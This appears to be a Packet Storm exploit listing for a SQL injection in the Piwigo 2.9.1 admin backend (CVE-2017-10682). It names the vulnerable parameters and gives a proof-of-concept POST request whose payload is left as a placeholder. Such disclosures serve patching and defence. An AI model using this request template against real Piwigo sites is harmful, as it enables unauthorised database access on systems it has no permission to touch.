Lucene search

K
packetstormAkityoPACKETSTORM:145442
HistoryDec 15, 2017 - 12:00 a.m.

Piwigo 2.9.1 SQL Injection

2017-12-1500:00:00
Akityo
packetstormsecurity.com
33
piwigo
sql injection
webapps
cve-2017-10682
remote users
arbitrary commands
security vulnerability

EPSS

0.002

Percentile

55.8%

`# # # # #   
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection  
# Dork: N/A  
# Date: 12.12.2017  
# Vendor Homepage: http://piwigo.org/  
# Software Link: http://piwigo.org/basics/downloads  
# Version: <= 2.9.1  
# Category: Webapps  
# Tested on: WiN7_x64/WIN10_X64  
# CVE: CVE-2017-10682  
# # # # #  
# Exploit Author: Akityo  
# Email: [email protected]  
# # # # #  
# Description:  
#  
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter  
# in the comments or status page to cat_options.php.  
#  
#  
# # # # #  
# Proof-of-Concent:  
#  
# POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1  
# Host: www.test.com  
# Content-Length: 34  
# Cache-Control: max-age=0  
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
# Upgrade-Insecure-Requests: 1  
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36  
# Content-Type: application/x-www-form-urlencoded  
# Accept-Encoding: gzip, deflate  
# Accept-Language: zh-CN,zh;q=0.8  
# Cookie: null  
# Connection: close  
#  
# cat_false%5B%5D=[payload here]&trueify=%C2%AB  
#  
#   
# # # # #  
  
`

EPSS

0.002

Percentile

55.8%